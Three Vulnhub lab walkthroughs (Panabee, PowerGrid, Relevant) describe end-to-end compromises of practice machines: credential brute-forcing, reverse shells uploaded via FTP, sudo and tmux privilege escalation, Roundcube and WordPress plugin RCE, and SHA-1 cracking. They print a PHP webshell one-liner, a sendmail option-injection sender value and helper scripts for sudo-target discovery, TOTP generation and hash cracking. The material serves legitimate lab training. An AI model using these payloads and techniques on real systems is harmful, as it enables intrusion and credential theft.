Panabee: 1: Vulnhub Walkthrough

Introduction

Today we are going to crack a vulnerable machine called Panabee: 1. It was created by ch4rm, who is on Twitter as aniqfakhrul. This is a boot-to-root challenge: we need to obtain root privileges on the machine and read the root flag to complete it. Overall it was an intermediate machine to crack.

Download Lab from here.

Penetration Testing Methodology

  • Network Scanning
    • Nmap Port Scan
  • Enumeration
    • Browsing HTTP Service
    • Enumerating SMB Service
    • Bruteforcing FTP Credentials
    • Enumerating FTP Service
  • Exploitation
    • Exploiting File Upload Vulnerability
  • Post Exploitation
    • Enumerating Sudo Permissions
    • Uploading Malicious Script
    • Getting Jenny User Session
    • Downloading the pspy64 binary
    • Running pspy64
  • Privilege Escalation
    • Exploiting tmux for Root
  • Reading Root Flag

Walkthrough

Network Scanning

The IP address of the machine was found to be 192.168.0.165. To move forward we need to find the services running on it, which we do with an aggressive nmap scan (nmap -A). Nmap reveals a lot of services: FTP (21), SSH (22), SMTP (25), HTTP (80) and SMB/NetBIOS (139, 445).

Enumeration

We start with the enumeration stage. The first service we decided to look at was HTTP. Opening the IP address in a web browser shows only the Apache2 default page, so there is nothing of interest here.

Next we enumerated SMB, connecting with the smbclient tool to list the shares hosted on the machine. The share “note” seemed worth looking into, so we connected to it and found a text file of the same name, which we downloaded with the get command. The note is addressed to goper, which gives us a username. It apologises for a late response and mentions that the server will back up whatever files are in goper's home directory.

Since goper is a user on the machine, it is possible that goper also has access to the FTP service, but we do not yet know a password. Brute-forcing seemed like a good idea here, so we ran Hydra with the rockyou wordlist against FTP. Within a few seconds Hydra showed that the password for goper is spiderman. My spider senses are tingling. Let’s take a look inside the FTP service.

We connect to FTP with the credentials we just found and see a Python file named status.py, which we download to take a closer look at it. The script simply sends ping packets to the server (its own IP address) and writes whether the server is up or down into a file status.txt inside the home directory of the user jenny. So we have another username.

Exploitation

The note said that whatever is placed in goper's home directory gets backed up, and FTP lets us write into that directory as goper, so the backup process will pick up anything we upload there. That makes this simple: we create a bash reverse shell script, upload it over FTP and let the backup process run it, giving us a session on the target machine. We created the shell file as shown in the image below.

We connect to the FTP service again and upload the backup.sh payload with the put command. The upload was successful.

Post Exploitation

We started a netcat listener to catch the session from the payload, and a few moments later it connected back. With a shell as goper, we ran sudo -l to see which commands can be run with elevated privileges. The output shows that goper may run the status.py file via sudo as the user jenny. Since we can overwrite status.py through FTP, we replace it with a reverse shell and run it through sudo to get a session as jenny.
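The check behind this step, as an added example that is not part of the original walkthrough: parse the output of sudo -l and flag every entry whose target file the current user can overwrite, because such an entry hands over the run-as user's privileges. The sample output, the path /home/goper/status.py and the NOPASSWD tag are assumptions for illustration; the box only showed that goper may run status.py as jenny.

```python
import os
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample of `sudo -l` output. The exact path of status.py and the
# NOPASSWD tag are assumptions; the real box only showed that goper may run
# status.py as jenny.
SAMPLE_SUDO_L = """\
Matching Defaults entries for goper on panabee:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User goper may run the following commands on panabee:
    (jenny) NOPASSWD: /home/goper/status.py
    (root) /usr/bin/apt-get update
"""

# One sudoers entry as printed by `sudo -l`: "(runas) [TAG: ...] /absolute/path [args]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?:[A-Z]+:\s*)*(?P<cmd>/\S+)")


def parse_sudo_entries(output: str) -> List[Tuple[str, str]]:
    """Return (runas, command_path) for every command line in `sudo -l` output."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group("runas"), m.group("cmd")))
    return entries


def default_writable(path: str) -> bool:
    """Can we overwrite the target? If it does not exist yet, can we create it?"""
    if os.path.exists(path):
        return os.access(path, os.W_OK)
    return os.access(os.path.dirname(path) or "/", os.W_OK)


def find_writable_sudo_targets(
    output: str, writable: Callable[[str], bool] = default_writable
) -> Dict[str, str]:
    """Map command_path -> runas user for each sudo entry whose target we can replace.

    A writable target means the sudo rule hands us that user's privileges: replace
    the file with our own code and run it through sudo, exactly as done with status.py.
    """
    return {cmd: runas for runas, cmd in parse_sudo_entries(output) if writable(cmd)}


if __name__ == "__main__":
    # Simulate the box: status.py sits in goper's home, where FTP lets goper write.
    on_box = lambda p: p == "/home/goper/status.py"
    for cmd, runas in find_writable_sudo_targets(SAMPLE_SUDO_L, on_box).items():
        print(f"[!] {cmd} is writable and runs as {runas}: sudo -u {runas} {cmd}")
```

Run without the simulated checker on a real shell and it uses os.access, so it only reports files the current account can actually replace; a rule pointing at a root-owned script in /usr/local/bin is not reported, because the attack depends on the write, not on the rule alone.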

We created a Python reverse shell targeting port 8888 of our local machine.

We send this file to the target over FTP. The uploaded file will not have execute permission, so we set it with the FTP client's chmod command (sent to the server as a SITE CHMOD request), as shown in the image below.

We start a listener on port 8888, go back to our goper session and execute the file we just uploaded as jenny through sudo.

Back at the listener we have a session as jenny. We move to /tmp, which is writable, download the pspy64 binary onto the target, make it executable and run it. pspy watches the process list without needing root, so it shows cron jobs and other users' commands as they run.

We see processes belonging to a tmux server, which suggests that it may be possible to get root through tmux.

We also look at the shell history and find that tmux was used a lot. One command shows that a tmux session is being shared through a socket file, and that this default socket is located under /opt.

Privilege Escalation

Getting root from tmux is not a difficult task. If you are not familiar with tmux or with getting root through it, check our article here. We need to export TERM=xterm so that tmux can run in this shell, then attach to the shared default socket with tmux's -S option. This only works because the socket file under /opt is accessible to jenny: whoever can connect to the socket gets the session of the user who owns the server, here root.

With TERM set to xterm, tmux attaches to the shared session and we have root privileges, as shown in the image below. We then move to the root directory and read the root flag. This concludes the box.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on Twitter and LinkedIn

PowerGrid: 1.0.1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “PowerGrid: 1.0.1“. It’s available at VulnHub for penetration testing and you can download it from here.

Credit for making this lab goes to Thomas Williams. Let’s start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

  • Netdiscover
  • Nmap

Enumeration

  • Dirsearch

Exploiting

  • HTTP Basic Authentication Brute Force
  • Remote code execution (RCE) via Roundcube exploit
  • Decrypt PGP message and abuse the SSH key it contains

Privilege Escalation

  • Abuse of sudo rsync
  • SSH pivoting back to the host
  • Capture the flag

Walkthrough

Reconnaissance

We look for the machine with netdiscover.

We add the IP address to our “/etc/hosts” file and run an nmap scan of all ports with OS detection, version detection, default scripts and traceroute.

Enumeration

The game begins, and so does the pressure: we have only 3 hours to solve the challenge and save the critical infrastructure.

We access the web service and see the countdown; the page also lists three users: deez1, p48 and all2.

We run dirsearch and find a directory protected with HTTP Basic Authentication.

With the three usernames we know, we run a brute-force attack against it with the Hydra tool and the rockyou dictionary.

The credentials we obtained let us in, and behind the directory we find a webmail interface running Roundcube.

The same credentials work for Roundcube, where we can read a single email containing a PGP-encrypted message. To read it in plain text we need the private key and its passphrase. The passphrase is very likely the same password, since this user has reused it across several services.

Exploiting

We identify the Roundcube version and look for exploits, finding that this version is vulnerable to remote code execution (RCE).

Exploit: https://www.exploit-db.com/exploits/40892

As always, we first review what the exploit does and make a proof of concept; this proof writes a file info.php on the server.

Legitimate request:

Malicious request:

We request the file and confirm that the site is indeed vulnerable.
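To show what the malicious request does that the legitimate one does not, here is an added Python model of the bug class the linked exploit abuses: the sender address is glued onto the sendmail command line, so an address containing whitespace turns into extra sendmail options (the -X option logs the whole session, message body included, to a file of the attacker's choosing). This is a simplification written for this page, not Roundcube's or the exploit's code; the hostname, sender and log path are constructed for illustration.

```python
import re
import shlex
from typing import List

SENDMAIL = "/usr/sbin/sendmail"


def sendmail_argv_vulnerable(from_addr: str) -> List[str]:
    """Model of the bug class: the sender is glued onto a command line that a shell
    later splits on whitespace. escapeshellcmd()-style neutralisation of ; | & and
    friends does not help, because spaces and dashes are left untouched."""
    cmdline = f"{SENDMAIL} -t -i -f{from_addr}"
    return shlex.split(cmdline)


# Strict sender syntax: one local part, one dotted domain, no whitespace or option-like text.
ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def sendmail_argv_hardened(from_addr: str) -> List[str]:
    """Validate the sender against a strict grammar and pass it as a single argv
    element with no shell in between, so it can never become extra options."""
    if not ADDR_RE.match(from_addr):
        raise ValueError(f"invalid sender address: {from_addr!r}")
    return [SENDMAIL, "-t", "-i", "-f" + from_addr]


def injected_options(argv: List[str]) -> List[str]:
    """Options that appear after the -f sender, i.e. the ones the attacker smuggled in."""
    seen_from = False
    extra = []
    for arg in argv:
        if seen_from and arg.startswith("-"):
            extra.append(arg)
        if arg.startswith("-f"):
            seen_from = True
    return extra


# Constructed inputs: a normal sender and one carrying sendmail options that make the
# MTA write its debug log (containing the message body) into a file under the web root.
LEGIT_FROM = "user@powergrid.local"
EVIL_FROM = "user@powergrid.local -OQueueDirectory=/tmp -X/var/www/html/info.php"

if __name__ == "__main__":
    print("legit   :", sendmail_argv_vulnerable(LEGIT_FROM))
    print("injected:", injected_options(sendmail_argv_vulnerable(EVIL_FROM)))
    try:
        sendmail_argv_hardened(EVIL_FROM)
    except ValueError as e:
        print("hardened:", e)
```

The hardened variant rejects the crafted address before anything reaches sendmail; the defensive lesson is that address validation, not shell escaping, is what stops option injection into a helper binary.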

Now we create a PHP file that lets us execute arbitrary commands.

Payload (URL-encoded when sent): <?php passthru($_GET['cmd']); ?>

We check that our file works:

Perfect! Now we start a netcat listener and run a reverse shell through the webshell (remember to URL-encode every character of the command).

Great! Now we use our two favourite commands to upgrade to an interactive TTY.

Going through files and directories recursively, we stumble upon the first flag and the first hint.

Following it, we switch to the user “p48” with the same reused credentials and find in his home folder the GPG private key (the one piece we were still missing to decrypt the message).

For some strange reason, the native “gpg” tool didn’t work for me, so I had to use this online tool, and we obtain an SSH private key.

The machine we have compromised has no SSH service open. Remembering the “pivot” hint, we check the network connections and find a service running in a “docker” container.

We set permissions 600 on the private key and use it to SSH into the container, where we read the 2nd flag and the next hint.

The next hint leads us to run “sudo -l”, which shows that we can run the rsync binary as root. We execute the following command to escalate privileges to root by abusing this.

Once root, we enter its folder and read the 3rd flag and the next hint.

Privilege Escalation (root)

“backwards? pivoting?” We repeat the SSH move, but this time from the compromised Docker container back to the host.

Great! We have root permissions on the host and can read the last flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.

Relevant: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “Relevant: 1“. It’s available at VulnHub for penetration testing and you can download it from here.

Credit for making this lab goes to @iamv1nc3nt. Let’s start and learn how to break it down successfully.

Level: Intermediate

Penetration Testing Methodology

Reconnaissance

  • Netdiscover
  • Nmap

Enumeration

  • Dirsearch
  • Nmap with scripts WordPress

Exploiting

  • Wp-file-manager 6.7 Remote Code Execution (RCE)

Privilege Escalation

  • Abuse of credentials with weak hashes in hidden files
  • Abuse of sudo
  • Capture the flag

Walkthrough

Reconnaissance

We look for the machine with netdiscover.

We add the IP address to our “/etc/hosts” file and run an nmap scan of all ports with OS detection, version detection, default scripts and traceroute.

Enumeration

So far it all seems easy: a web service with some links containing leaked credential information and a QR code to set up two-factor authentication (2FA). Too good to be true!

List of credentials from public leaks.

Content of the QR code:

We log in via SSH, enter the password, enter the second factor and are immediately disconnected! The account is not allowed to use this service, so it is a rabbit hole.
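What the QR code carries and how the second factor is derived from it, as an added example that is not part of the original walkthrough: an enrolment QR code encodes an otpauth://totp/ URI holding a base32 secret, and the six-digit code is an HMAC of the current 30-second counter (RFC 4226/6238), so a tester who has the URI can generate codes without the phone app. The URI below is constructed; its secret is the RFC 6238 reference seed so the output can be checked against the published test values.

```python
import base64
import hashlib
import hmac
import struct
import time
from urllib.parse import parse_qs, unquote, urlsplit

# RFC 6238 reference seed (ASCII "12345678901234567890") in the base32 form used by QR codes.
SAMPLE_SECRET_B32 = base64.b32encode(b"12345678901234567890").decode()
# Constructed otpauth URI of the kind a 2FA enrolment QR code encodes; label and issuer are made up.
SAMPLE_URI = f"otpauth://totp/example:user?secret={SAMPLE_SECRET_B32}&issuer=example&digits=6&period=30"


def parse_otpauth(uri: str) -> dict:
    """Extract the TOTP parameters from an otpauth://totp/<label>?secret=... URI."""
    parts = urlsplit(uri)
    if parts.scheme != "otpauth" or parts.netloc != "totp":
        raise ValueError("not a TOTP otpauth URI")
    q = parse_qs(parts.query)
    return {
        "label": unquote(parts.path.lstrip("/")),
        "secret": q["secret"][0],
        "digits": int(q.get("digits", ["6"])[0]),
        "period": int(q.get("period", ["30"])[0]),
        "algorithm": q.get("algorithm", ["SHA1"])[0].upper(),
    }


def hotp(secret_b32: str, counter: int, digits: int = 6, algorithm: str = "SHA1") -> str:
    """RFC 4226: HMAC the 8-byte big-endian counter, dynamic-truncate, keep the low digits."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)   # QR secrets often omit padding
    key = base64.b32decode(padded, casefold=True)
    digest = hmac.new(key, struct.pack(">Q", counter), getattr(hashlib, algorithm.lower())).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret_b32: str, at: int, digits: int = 6, period: int = 30, algorithm: str = "SHA1") -> str:
    """RFC 6238: HOTP with the counter set to floor(unix_time / period)."""
    return hotp(secret_b32, at // period, digits, algorithm)


def totp_from_uri(uri: str, at: int = None) -> str:
    """Generate the code for now (or for a given unix time) straight from the QR code contents."""
    p = parse_otpauth(uri)
    at = int(time.time()) if at is None else at
    return totp(p["secret"], at, p["digits"], p["period"], p["algorithm"])


if __name__ == "__main__":
    print(parse_otpauth(SAMPLE_URI)["label"], "->", totp_from_uri(SAMPLE_URI))
```

Because the code depends only on the shared secret and the clock, anyone who can read the enrolment QR code (here, a public web page) holds the second factor outright; the 2FA on this box adds nothing beyond the leaked password.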

It’s time to launch my favourite fuzzing tool; in my case I used dirsearch. It shows that WordPress files and directories are exposed on the machine.

Going back to the clue given by the creator of the machine in its description: “enumerate the box, then enumerate the box differently“.

Since our only lead is the remains of a WordPress install, we try nmap's WordPress NSE scripts.

They list two plugins, among them “wp-file-manager 6.7“.

Exploiting

With that, we look for exploits and vulnerabilities affecting this plugin version and find one that allows remote code execution without authentication.

Exploit: https://github.com/w4fz5uck5/wp-file-manager-0day

We run the exploit and get access to the server.

Since visibility is limited, we upload a “pentestmonkey” PHP reverse shell, start a netcat listener and request the shell.

We run our two favourite commands to upgrade to an interactive TTY.

We read the file “wp-config.php“, but something tells me the password in it is not going to help us much either. xD

We check the files of the user “h4x0r” and find a “hidden” folder named with three dots; in it is a file called “note.txt” with credentials hashed with SHA-1 that we must crack.

We go to the online site “hashes.com”, submit our hash and get the password in plain text.
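Cracking the hashes offline instead of pasting them into a third-party site, as an added example that is not part of the original walkthrough: pull every 40-hex-digit SHA-1 out of a note.txt-style file and run a wordlist through it in a single pass. The file contents and the mini wordlist are constructed (the hashes are of “password” and “123456”); the real note.txt is not reproduced here.

```python
import hashlib
import re
from typing import Dict, Iterable

# Constructed stand-in for the note.txt found on the box: "user:sha1hex" lines.
# The real file's contents are not reproduced; these hashes are of "password" and "123456".
SAMPLE_NOTE = """\
# credentials (constructed example)
alice:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
bob:7c4a8d09ca3762af61e59520943dc26494f8941b
"""

# Constructed mini wordlist standing in for rockyou.txt
SAMPLE_WORDLIST = ["letmein", "password", "qwerty", "123456"]

# A 40-hex-digit token not embedded in a longer hex string
HEX_SHA1 = re.compile(r"(?<![0-9a-fA-F])([0-9a-fA-F]{40})(?![0-9a-fA-F])")


def extract_hashes(text: str) -> Dict[str, str]:
    """Return {sha1_hex: label} for each line carrying a SHA-1-sized token.
    The label is whatever precedes the first ':' on the line, or '?' if there is none."""
    found = {}
    for line in text.splitlines():
        m = HEX_SHA1.search(line)
        if not m:
            continue
        label = line.split(":", 1)[0].strip() if ":" in line else "?"
        found[m.group(1).lower()] = label
    return found


def crack_sha1(targets: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """One pass over the wordlist: hash each candidate once and match it against every
    outstanding target, stopping early once all are recovered. Unsalted SHA-1 is cheap,
    so even pure Python gets through a few million candidates in reasonable time."""
    remaining = {h.lower() for h in targets}
    cracked = {}
    for word in wordlist:
        word = word.rstrip("\r\n")
        h = hashlib.sha1(word.encode("utf-8", "ignore")).hexdigest()
        if h in remaining:
            cracked[h] = word
            remaining.discard(h)
            if not remaining:
                break
    return cracked


def crack_note(note_text: str, wordlist: Iterable[str]) -> Dict[str, str]:
    """Convenience: {label: password} for everything in a note.txt we managed to crack."""
    hashes = extract_hashes(note_text)
    return {hashes[h]: pw for h, pw in crack_sha1(hashes, wordlist).items()}


if __name__ == "__main__":
    # Against the real files: crack_note(open("note.txt").read(), open("rockyou.txt", errors="ignore"))
    print(crack_note(SAMPLE_NOTE, SAMPLE_WORDLIST))
```

On an engagement, uploading a client's hashes to a public cracking site discloses them to a third party; for full-size wordlists the same job is done offline with hashcat (mode 100) or john (format Raw-SHA1).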

Privilege Escalation (root)

Now we authenticate as the user “news“, run “sudo -l” and see that we may execute the “node” binary as root.

We take advantage of this to escalate privileges to root on the system, using the following syntax.

And finally, we read our well-deserved flag!

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.